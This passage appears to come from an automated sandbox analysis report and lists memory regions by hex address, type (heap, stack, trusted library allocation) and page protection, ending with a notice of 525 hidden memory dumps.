page read and write | page guard
|
||
|
2B4C000
|
heap
|
page read and write
|
||
|
670000
|
trusted library allocation
|
page read and write
|
||
|
43C2000
|
trusted library allocation
|
page read and write
|
||
|
1EA6000
|
heap
|
page read and write
|
||
|
450000
|
trusted library allocation
|
page read and write
|
||
|
4280000
|
trusted library allocation
|
page read and write
|
||
|
36C2000
|
trusted library allocation
|
page read and write
|
||
|
5DFE000
|
stack
|
page read and write
|
||
|
24C0000
|
trusted library allocation
|
page read and write
|
||
|
4BAF000
|
stack
|
page read and write
|
||
|
4F74000
|
heap
|
page read and write
|
||
|
687000
|
heap
|
page read and write
|
||
|
8EF0000
|
heap
|
page read and write
|
||
|
940D000
|
stack
|
page read and write
|
||
|
4410000
|
trusted library allocation
|
page read and write
|
||
|
490000
|
trusted library allocation
|
page execute and read and write
|
||
|
30E000
|
stack
|
page read and write
|
||
|
36C9000
|
trusted library allocation
|
page read and write
|
||
|
3B41000
|
heap
|
page read and write
|
||
|
5B4000
|
heap
|
page read and write
|
||
|
4CAD000
|
stack
|
page read and write
|
||
|
4756000
|
heap
|
page execute and read and write
|
||
|
2E5E000
|
stack
|
page read and write
|
||
|
2CF8000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
1EAF000
|
stack
|
page read and write
|
||
|
2B7F000
|
heap
|
page read and write
|
||
|
3131000
|
trusted library allocation
|
page read and write
|
||
|
4130000
|
trusted library allocation
|
page read and write
|
||
|
51C000
|
heap
|
page read and write
|
||
|
437000
|
heap
|
page read and write
|
||
|
36CE000
|
stack
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
4D5E000
|
stack
|
page read and write
|
||
|
27000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2BE1000
|
heap
|
page read and write
|
||
|
4D60000
|
heap
|
page read and write
|
||
|
4DCE000
|
stack
|
page read and write
|
||
|
4BB000
|
heap
|
page read and write
|
||
|
533E000
|
stack
|
page read and write
|
||
|
466000
|
heap
|
page read and write
|
||
|
3B57000
|
heap
|
page read and write
|
||
|
3B65000
|
heap
|
page read and write
|
||
|
2BAD000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
3A81000
|
heap
|
page read and write
|
||
|
3EDE000
|
stack
|
page read and write
|
||
|
5432000
|
heap
|
page read and write
|
||
|
3078000
|
trusted library allocation
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
4B7C000
|
stack
|
page read and write
|
||
|
2C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
67D000
|
heap
|
page read and write
|
||
|
4E20000
|
heap
|
page read and write
|
||
|
52FF000
|
stack
|
page read and write
|
||
|
4140000
|
heap
|
page read and write
|
||
|
23BE000
|
stack
|
page read and write
|
||
|
1E40000
|
trusted library allocation
|
page read and write
|
||
|
2BF5000
|
heap
|
page read and write
|
||
|
2CFB000
|
heap
|
page read and write
|
||
|
42B0000
|
heap
|
page execute and read and write
|
||
|
520000
|
trusted library allocation
|
page read and write
|
||
|
50E000
|
heap
|
page read and write
|
||
|
45F000
|
heap
|
page read and write
|
||
|
51B000
|
heap
|
page read and write
|
||
|
4F6E000
|
stack
|
page read and write
|
||
|
2B7F000
|
heap
|
page read and write
|
||
|
2CF4000
|
heap
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
260000
|
trusted library allocation
|
page read and write
|
||
|
462C000
|
stack
|
page read and write
|
||
|
912C000
|
stack
|
page read and write
|
||
|
3B57000
|
heap
|
page read and write
|
||
|
3B61000
|
heap
|
page read and write
|
||
|
27B000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
67B000
|
heap
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
3B5D000
|
heap
|
page read and write
|
||
|
4750000
|
heap
|
page execute and read and write
|
||
|
27B9000
|
trusted library allocation
|
page read and write
|
||
|
4C6000
|
heap
|
page read and write
|
||
|
8F34000
|
heap
|
page read and write
|
||
|
3B70000
|
heap
|
page read and write
|
||
|
1E70000
|
trusted library allocation
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
5FC0000
|
heap
|
page read and write
|
||
|
3053000
|
trusted library allocation
|
page read and write
|
||
|
2D2000
|
trusted library allocation
|
page read and write
|
||
|
4C8D000
|
stack
|
page read and write
|
||
|
1F10000
|
heap
|
page read and write
|
||
|
473E000
|
stack
|
page read and write
|
||
|
680000
|
heap
|
page execute and read and write
|
||
|
4FA3000
|
heap
|
page read and write
|
||
|
3B57000
|
heap
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
1DE4000
|
heap
|
page read and write
|
||
|
2BA1000
|
heap
|
page read and write
|
||
|
210000
|
trusted library allocation
|
page read and write
|
||
|
1F40000
|
trusted library allocation
|
page read and write
|
||
|
200000
|
trusted library allocation
|
page read and write
|
||
|
1F20000
|
trusted library allocation
|
page read and write
|
||
|
1E7E000
|
stack
|
page read and write
|
||
|
31FC000
|
stack
|
page read and write
|
||
|
2B84000
|
heap
|
page read and write
|
||
|
5CBE000
|
stack
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
25A3000
|
trusted library allocation
|
page read and write
|
||
|
9880000
|
trusted library allocation
|
page read and write
|
||
|
330000
|
trusted library allocation
|
page read and write
|
||
|
235000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D63000
|
heap
|
page read and write
|
||
|
1F10000
|
heap
|
page read and write
|
||
|
2510000
|
trusted library allocation
|
page read and write
|
||
|
4FB0000
|
heap
|
page read and write
|
||
|
608000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
505D000
|
heap
|
page read and write
|
||
|
27C8000
|
trusted library allocation
|
page read and write
|
||
|
5140000
|
heap
|
page read and write
|
||
|
27B1000
|
trusted library allocation
|
page read and write
|
||
|
2425000
|
trusted library allocation
|
page read and write
|
||
|
602000
|
heap
|
page read and write
|
||
|
2520000
|
heap
|
page read and write
|
||
|
572000
|
heap
|
page read and write
|
||
|
1F00000
|
trusted library allocation
|
page read and write
|
||
|
441E000
|
stack
|
page read and write
|
||
|
539000
|
heap
|
page read and write
|
||
|
65C000
|
heap
|
page read and write
|
||
|
1EFB000
|
stack
|
page read and write
|
||
|
3B5D000
|
heap
|
page read and write
|
||
|
2C0A000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
3048000
|
trusted library allocation
|
page read and write
|
||
|
53EE000
|
stack
|
page read and write
|
||
|
246F000
|
stack
|
page read and write
|
||
|
45EE000
|
stack
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
3B5D000
|
heap
|
page read and write
|
||
|
5FAE000
|
stack
|
page read and write
|
||
|
46AE000
|
stack
|
page read and write
|
||
|
4F2000
|
heap
|
page read and write
|
||
|
366D000
|
heap
|
page read and write
|
||
|
67E000
|
heap
|
page read and write
|
||
|
4ABF000
|
stack
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
3B71000
|
heap
|
page read and write
|
||
|
5E2000
|
heap
|
page read and write
|
||
|
5414000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
3B70000
|
heap
|
page read and write
|
||
|
4C3E000
|
stack
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
987C000
|
stack
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
1DE0000
|
heap
|
page read and write
|
||
|
496000
|
heap
|
page read and write
|
||
|
4BB000
|
heap
|
page read and write
|
||
|
4410000
|
trusted library allocation
|
page read and write
|
||
|
61BE000
|
stack
|
page read and write
|
||
|
218F000
|
trusted library allocation
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
4F4F000
|
stack
|
page read and write
|
||
|
20D000
|
trusted library allocation
|
page execute and read and write
|
||
|
92BE000
|
stack
|
page read and write
|
||
|
27CC000
|
trusted library allocation
|
page read and write
|
||
|
1F8E000
|
stack
|
page read and write
|
||
|
214B000
|
trusted library allocation
|
page read and write
|
||
|
203000
|
trusted library allocation
|
page execute and read and write
|
||
|
954F000
|
stack
|
page read and write
|
||
|
4F70000
|
heap
|
page read and write
|
||
|
3EE000
|
stack
|
page read and write
|
||
|
628000
|
heap
|
page read and write
|
||
|
4BBE000
|
stack
|
page read and write
|
||
|
2B43000
|
heap
|
page read and write
|
||
|
20DF000
|
stack
|
page read and write
|
||
|
2BDC000
|
heap
|
page read and write
|
||
|
27C4000
|
trusted library allocation
|
page read and write
|
||
|
630000
|
trusted library allocation
|
page read and write
|
||
|
23EE000
|
stack
|
page read and write
|
||
|
61F000
|
heap
|
page read and write
|
||
|
41EE000
|
stack
|
page read and write
|
||
|
3B5F000
|
heap
|
page read and write
|
||
|
2155000
|
trusted library allocation
|
page read and write
|
||
|
3060000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
5DB000
|
heap
|
page read and write
|
||
|
2BDC000
|
heap
|
page read and write
|
||
|
3261000
|
trusted library allocation
|
page read and write
|
||
|
4AE000
|
heap
|
page read and write
|
||
|
57A000
|
heap
|
page read and write
|
||
|
1EED000
|
stack
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
454000
|
heap
|
page read and write
|
||
|
8EED000
|
stack
|
page read and write
|
||
|
5D0000
|
trusted library allocation
|
page read and write
|
||
|
1E80000
|
heap
|
page read and write
|
||
|
71A000
|
heap
|
page read and write
|
||
|
45CF000
|
stack
|
page read and write
|
||
|
5ED000
|
heap
|
page read and write
|
||
|
43AB000
|
stack
|
page read and write
|
||
|
5047000
|
heap
|
page read and write
|
||
|
614E000
|
stack
|
page read and write
|
||
|
578000
|
heap
|
page read and write
|
||
|
293F000
|
stack
|
page read and write
|
||
|
5000000
|
heap
|
page read and write
|
||
|
4E6000
|
heap
|
page read and write
|
||
|
4C2E000
|
stack
|
page read and write
|
||
|
3A7F000
|
stack
|
page read and write
|
||
|
2B7C000
|
heap
|
page read and write
|
||
|
3BE0000
|
heap
|
page read and write
|
||
|
462A000
|
stack
|
page read and write
|
||
|
4B1000
|
heap
|
page read and write
|
||
|
454C000
|
stack
|
page read and write
|
||
|
650000
|
trusted library allocation
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
27BC000
|
trusted library allocation
|
page read and write
|
||
|
4340000
|
trusted library allocation
|
page read and write
|
||
|
3159000
|
trusted library allocation
|
page read and write
|
||
|
958D000
|
stack
|
page read and write
|
||
|
3068000
|
trusted library allocation
|
page read and write
|
||
|
480000
|
trusted library allocation
|
page read and write
|
||
|
6FE000
|
stack
|
page read and write
|
||
|
609000
|
heap
|
page read and write
|
||
|
530000
|
trusted library allocation
|
page read and write
|
||
|
5D6000
|
heap
|
page read and write
|
||
|
3B44000
|
heap
|
page read and write
|
||
|
49B000
|
heap
|
page read and write
|
||
|
597000
|
heap
|
page read and write
|
||
|
2B1F000
|
stack
|
page read and write
|
||
|
3BA0000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
2D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
203000
|
trusted library allocation
|
page execute and read and write
|
||
|
4290000
|
trusted library allocation
|
page read and write
|
||
|
4ABE000
|
stack
|
page read and write
|
||
|
3B4D000
|
heap
|
page read and write
|
||
|
62F000
|
stack
|
page read and write
|
||
|
550000
|
heap
|
page execute and read and write
|
||
|
3660000
|
heap
|
page read and write
|
||
|
503000
|
heap
|
page read and write
|
||
|
269A000
|
trusted library allocation
|
page read and write
|
There are 525 hidden memdumps, click here to show them.